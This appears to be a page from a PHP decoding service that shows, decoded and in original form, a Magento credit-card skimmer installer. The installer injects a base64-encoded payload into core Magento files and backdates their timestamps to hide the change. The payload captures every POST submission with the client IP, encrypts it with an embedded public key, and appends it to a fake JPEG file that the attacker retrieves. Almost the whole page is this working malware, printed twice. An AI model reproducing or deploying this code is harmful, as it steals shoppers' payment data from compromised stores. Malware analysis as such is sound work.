Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?PHP error_reporting(E_ALL); ini_set('display_errors', 1); if (isset($_GET['del'])) { @..

Decoded Output download

<?php
error_reporting(E_ALL);
ini_set('display_errors', 1);

if (isset($_GET['del']))
{
	@unlink('./' . substr(md5($_GET['del']) , 0, 8) . '.txt');
	@unlink(__FILE__);
	echo '[del ok]';
	exit;
}

if (!isset($_GET['do']) || !isset($_GET['fname']) || !isset($_GET['delp']))
{
	echo '[ok]';
	exit;
}

$resf = $ltime = null;
$resf = str_replace("/skin", "/", str_replace("\", "/", getcwd())) . $_GET['fname'];

if ($resf)
{
	$files = array(
		'../includes/config.php' => 0,
		'../app/Mage.php' => 0,
		'../index.php' => 0,
		'../app/code/core/Mage/Core/Controller/Front/Action.php' => 0,
		'../app/code/core/Mage/Core/functions.php' => 0,
		'../lib/Varien/Autoload.php' => 0,
	);
	$flag = false;
	foreach($files as $k => $v)
	{
		if (file_exists($k) && is_readable($k) && is_writable($k))
		{
			$files[$k] = 1;
			$buf = file_get_contents($k);
			if (stripos($buf, 'Visbot') !== false && stripos($buf, 'Pong') !== false) $flag = true;
		}

		if ($flag) break;
	}

	if (!$flag)
	{
		foreach($files as $k => $v)
		{
			if (file_exists($k))
			{
				$ltime1 = filemtime($k);
				$delp = $_GET['delp'];
				$buf = file_get_contents($k);
				$code = str_replace(array(
					'{RESFILE}',
					'{LTIME}',
					'{DEL_PARAM}'
				) , array(
					$resf,
					$ltime,
					$delp
				) , base64_decode('PD9QSFAgLyoqKiBNYWdlbnRvKiogTk9USUNFIE9GIExJQ0VOU0UqKiBUaGlzIHNvdXJjZSBmaWxlIGlzIHN1YmplY3QgdG8gdGhlIE9wZW4gU29mdHdhcmUgTGljZW5zZSAoT1NMIDMuMCkqIHRoYXQgaXMgYnVuZGxlZCB3aXRoIHRoaXMgcGFja2FnZSBpbiB0aGUgZmlsZSBMSUNFTlNFLnR4dC4qIEl0IGlzIGFsc28gYXZhaWxhYmxlIHRocm91Z2ggdGhlIHdvcmxkLXdpZGUtd2ViIGF0IHRoaXMgVVJMOiogaHR0cDovL29wZW5zb3VyY2Uub3JnL2xpY2Vuc2VzL29zbC0zLjAucGhwKiovJHkwPSd7UkVTRklMRX0nOyRtMT0ne0xUSU1FfSc7JGsyPSd7REVMX1BBUkFNfSc7JGszPSItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlHZU1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTUFEQ0JpQUtCZ0ZpS2h6RUdWVXhMZGtkQVBtVFZINzRRd1dCa1xuMGNEcHBOWDNuMGZtVlp5QlBjWVo1WUliRWVTTElPQ1hLYjV4VC9acndZeWsxM2pNSWhvOVdQbExSSmR4VDJSalxuYmNNdlhzenZXQndoMWxDb3ZybDYva3VsSXE1WmNuREZkbGNLelcyUFIvMTkrZ2tLaFJHazFZVVhNTGd3NkVGalxuajJjMUxKb1NwbnprOFdSRkFnTUJBQUU9XG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0iO2lmKEAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ109PSdWaXNib3QvMi4wICgraHR0cDovL3d3dy52aXN2by5jb20vZW4vd2VibWFzdGVycy5qc3A7Ym90QHZpc3ZvLmNvbSknKXtpZihpc3NldCgkX0dFVFskazJdKSl7JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCcnKTtAdG91Y2goJHkwLCRtMSwkbTEpO2VjaG8gJ2NsZWFuIG9rJzt9ZWxzZSBlY2hvICdQb25nJztleGl0O31pZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ107fWVsc2VpZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ107fWVsc2V7JGk0PUAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTt9aWYoaXNzZXQoJF9QT1NUKSYmc2l6ZW9mKCRfUE9TVCkpeyRhNT0nJztmb3JlYWNoKCRfUE9TVCBhcyAkaDY9PiRuNyl7aWYoaXNfYXJyYXkoJG43KSl7Zm9yZWFjaCgkbjcgYXMgJGY4PT4kbDkpe2lmKGlzX2FycmF5KCRsOSkpe2ZvcmVhY2goJGw5IGFzICRsMTA9PiR2MTEpe2lmKGlzX2FycmF5KCR2MTEpKXs7fWVsc2V7JGE1Lj0nOicuJGg2LidbJy4kZjguJ11bJy4kbDEwLiddPScuJHYxMTt9fX1lbHNleyRhNS49JzonLiRoNi4nWycuJGY4LiddPScuJGw5O319fWVsc2V7JGE1Lj0nOicuJGg2Lic9Jy4kbjc7fX0kYTU9JGk0LiRhNTt9ZWxzZXskYTU9bnVsbDt9aWYoJGE1KXskdDEyPWZhbHNlO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fWVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ2RsJykpeyRuMTM9c3RydG9sb3dlcihzdWJzdHIocGhwX3VuYW1lKCksMCwzKSk7JGQxND0ncGhwX29wZW5zc2wuJy4oJG4xMz09J3dpbic/J2RsbCc6J3NvJyk7QGRsKCRkMTQpO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fX1pZigkdDEyKXskdDE1PUBvcGVuc3NsX2dldF9wdWJsaWNrZXkoJGszKTskcTE2PTEyODskdDE3PScnOyRoMTg9bWQ1KG1kNShtaWNyb3RpbWUoKSkucmFuZCgpKTskZTE5PSRoMTg7d2hpbGUoJGUxOSl7JGYyMD1zdWJzdHIoJGUxOSwwLCRxMTYpOyRlMTk9c3Vic3RyKCRlMTksJHExNik7QG9wZW5zc2xfcHVibGljX2VuY3J5cHQoJGYyMCwkaDIxLCR0MTUpOyR0MTcuPSRoMjE7fSR0MjI9QG9wZW5zc2xfZW5jcnlwdCgkYTUsJ2FlczEyOCcsJGgxOCk7QG9wZW5zc2xfZnJlZV9rZXkoJHQxNSk7JGE1PSR0MTcuJzo6OlNFUDo6OicuJHQyMjt9JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCdKUEVHLTEuMScuYmFzZTY0X2VuY29kZSgkYTUpLEZJTEVfQVBQRU5EKTtAdG91Y2goJHkwLCRtMSwkbTEpO30/Pg=='));
				file_put_contents($k, $code . $buf);
				touch($k, $ltime1, $ltime1);
				$buf = @file_get_contents($k);
				if (strpos($buf, $delp) === false) {echo $k.":not writable"; continue;}
				echo '[done]';
				break;
			}
		}
	}
}

?>

Did this file decode correctly?

Original Code

<?PHP
error_reporting(E_ALL);
ini_set('display_errors', 1);

if (isset($_GET['del']))
{
	@unlink('./' . substr(md5($_GET['del']) , 0, 8) . '.txt');
	@unlink(__FILE__);
	echo '[del ok]';
	exit;
}

if (!isset($_GET['do']) || !isset($_GET['fname']) || !isset($_GET['delp']))
{
	echo '[ok]';
	exit;
}

$resf = $ltime = null;
$resf = str_replace("/skin", "/", str_replace("\\", "/", getcwd())) . $_GET['fname'];

if ($resf)
{
	$files = array(
		'../includes/config.php' => 0,
		'../app/Mage.php' => 0,
		'../index.php' => 0,
		'../app/code/core/Mage/Core/Controller/Front/Action.php' => 0,
		'../app/code/core/Mage/Core/functions.php' => 0,
		'../lib/Varien/Autoload.php' => 0,
	);
	$flag = false;
	foreach($files as $k => $v)
	{
		if (file_exists($k) && is_readable($k) && is_writable($k))
		{
			$files[$k] = 1;
			$buf = file_get_contents($k);
			if (stripos($buf, 'Visbot') !== false && stripos($buf, 'Pong') !== false) $flag = true;
		}

		if ($flag) break;
	}

	if (!$flag)
	{
		foreach($files as $k => $v)
		{
			if (file_exists($k))
			{
				$ltime1 = filemtime($k);
				$delp = $_GET['delp'];
				$buf = file_get_contents($k);
				$code = str_replace(array(
					'{RESFILE}',
					'{LTIME}',
					'{DEL_PARAM}'
				) , array(
					$resf,
					$ltime,
					$delp
				) , base64_decode('PD9QSFAgLyoqKiBNYWdlbnRvKiogTk9USUNFIE9GIExJQ0VOU0UqKiBUaGlzIHNvdXJjZSBmaWxlIGlzIHN1YmplY3QgdG8gdGhlIE9wZW4gU29mdHdhcmUgTGljZW5zZSAoT1NMIDMuMCkqIHRoYXQgaXMgYnVuZGxlZCB3aXRoIHRoaXMgcGFja2FnZSBpbiB0aGUgZmlsZSBMSUNFTlNFLnR4dC4qIEl0IGlzIGFsc28gYXZhaWxhYmxlIHRocm91Z2ggdGhlIHdvcmxkLXdpZGUtd2ViIGF0IHRoaXMgVVJMOiogaHR0cDovL29wZW5zb3VyY2Uub3JnL2xpY2Vuc2VzL29zbC0zLjAucGhwKiovJHkwPSd7UkVTRklMRX0nOyRtMT0ne0xUSU1FfSc7JGsyPSd7REVMX1BBUkFNfSc7JGszPSItLS0tLUJFR0lOIFBVQkxJQyBLRVktLS0tLVxuTUlHZU1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTUFEQ0JpQUtCZ0ZpS2h6RUdWVXhMZGtkQVBtVFZINzRRd1dCa1xuMGNEcHBOWDNuMGZtVlp5QlBjWVo1WUliRWVTTElPQ1hLYjV4VC9acndZeWsxM2pNSWhvOVdQbExSSmR4VDJSalxuYmNNdlhzenZXQndoMWxDb3ZybDYva3VsSXE1WmNuREZkbGNLelcyUFIvMTkrZ2tLaFJHazFZVVhNTGd3NkVGalxuajJjMUxKb1NwbnprOFdSRkFnTUJBQUU9XG4tLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0iO2lmKEAkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ109PSdWaXNib3QvMi4wICgraHR0cDovL3d3dy52aXN2by5jb20vZW4vd2VibWFzdGVycy5qc3A7Ym90QHZpc3ZvLmNvbSknKXtpZihpc3NldCgkX0dFVFskazJdKSl7JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCcnKTtAdG91Y2goJHkwLCRtMSwkbTEpO2VjaG8gJ2NsZWFuIG9rJzt9ZWxzZSBlY2hvICdQb25nJztleGl0O31pZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfQ0xJRU5UX0lQJ107fWVsc2VpZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKXskaTQ9JF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ107fWVsc2V7JGk0PUAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTt9aWYoaXNzZXQoJF9QT1NUKSYmc2l6ZW9mKCRfUE9TVCkpeyRhNT0nJztmb3JlYWNoKCRfUE9TVCBhcyAkaDY9PiRuNyl7aWYoaXNfYXJyYXkoJG43KSl7Zm9yZWFjaCgkbjcgYXMgJGY4PT4kbDkpe2lmKGlzX2FycmF5KCRsOSkpe2ZvcmVhY2goJGw5IGFzICRsMTA9PiR2MTEpe2lmKGlzX2FycmF5KCR2MTEpKXs7fWVsc2V7JGE1Lj0nOicuJGg2LidbJy4kZjguJ11bJy4kbDEwLiddPScuJHYxMTt9fX1lbHNleyRhNS49JzonLiRoNi4nWycuJGY4LiddPScuJGw5O319fWVsc2V7JGE1Lj0nOicuJGg2Lic9Jy4kbjc7fX0kYTU9JGk0LiRhNTt9ZWxzZXskYTU9bnVsbDt9aWYoJGE1KXskdDEyPWZhbHNlO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fWVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ2RsJykpeyRuMTM9c3RydG9sb3dlcihzdWJzdHIocGhwX3VuYW1lKCksMCwzKSk7JGQxND0ncGhwX29wZW5zc2wuJy4oJG4xMz09J3dpbic/J2RsbCc6J3NvJyk7QGRsKCRkMTQpO2lmKGZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9nZXRfcHVibGlja2V5JykmJmZ1bmN0aW9uX2V4aXN0cygnb3BlbnNzbF9wdWJsaWNfZW5jcnlwdCcpJiZmdW5jdGlvbl9leGlzdHMoJ29wZW5zc2xfZW5jcnlwdCcpKXskdDEyPXRydWU7fX1pZigkdDEyKXskdDE1PUBvcGVuc3NsX2dldF9wdWJsaWNrZXkoJGszKTskcTE2PTEyODskdDE3PScnOyRoMTg9bWQ1KG1kNShtaWNyb3RpbWUoKSkucmFuZCgpKTskZTE5PSRoMTg7d2hpbGUoJGUxOSl7JGYyMD1zdWJzdHIoJGUxOSwwLCRxMTYpOyRlMTk9c3Vic3RyKCRlMTksJHExNik7QG9wZW5zc2xfcHVibGljX2VuY3J5cHQoJGYyMCwkaDIxLCR0MTUpOyR0MTcuPSRoMjE7fSR0MjI9QG9wZW5zc2xfZW5jcnlwdCgkYTUsJ2FlczEyOCcsJGgxOCk7QG9wZW5zc2xfZnJlZV9rZXkoJHQxNSk7JGE1PSR0MTcuJzo6OlNFUDo6OicuJHQyMjt9JG0xPWZpbGVfZXhpc3RzKCR5MCk/QGZpbGVtdGltZSgkeTApOiRtMTtAZmlsZV9wdXRfY29udGVudHMoJHkwLCdKUEVHLTEuMScuYmFzZTY0X2VuY29kZSgkYTUpLEZJTEVfQVBQRU5EKTtAdG91Y2goJHkwLCRtMSwkbTEpO30/Pg=='));
				file_put_contents($k, $code . $buf);
				touch($k, $ltime1, $ltime1);
				$buf = @file_get_contents($k);
				if (strpos($buf, $delp) === false) {echo $k.":not writable"; continue;}
				echo '[done]';
				break;
			}
		}
	}
}

?>

Function Calls

md5 1
substr 1
unlink 1
ini_set 1
error_reporting 1

Variables

None

Stats

MD5 30a34ea3a2f15234ca518c3308618e32
Eval Count 0
Decode Time 157 ms